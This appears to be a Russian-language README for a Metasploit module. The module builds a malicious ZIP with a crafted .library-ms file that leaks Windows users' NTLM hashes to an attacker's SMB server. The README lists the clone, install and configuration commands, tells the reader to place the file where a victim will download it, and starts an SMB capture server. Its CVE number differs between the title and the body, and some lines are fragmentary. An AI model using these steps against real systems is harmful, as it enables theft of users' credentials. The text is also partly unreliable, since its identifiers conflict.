
POC for CVE-2025-24054
Этот репозиторий содержит модуль Metasploit для эксплуатации уязвимости CVE-2025-24071, которая приводит к утечке NTLM-хэша при извлечении вредоносного файла .library-ms из ZIP-архива в Windows Explorer.
Разработано: FOLKS-IWD
Уязвимость возникает, когда пользователь извлекает ZIP-архив, содержащий специально сформированный файл .library-ms. Windows Explorer автоматически инициирует запрос SMB-аутентификации к удалённому серверу, указанному в файле, что приводит к утечке NTLM-хэша пользователя без какого-либо взаимодействия с ним.
Данный модуль Metasploit:
.library-ms.
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Замените на ваш IP-адрес
set FILENAME exploit.zip # Имя вредоносного ZIP-файла
set LIBRARY_NAME malicious.library-ms # Имя файла .library-ms
set SHARE_NAME shared # Имя общего ресурса SMB
run
exploit.zip). Разместите этот файл так, чтобы жертва могла его скачать и извлечь.use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Должен совпадать с ATTACKER_IP
run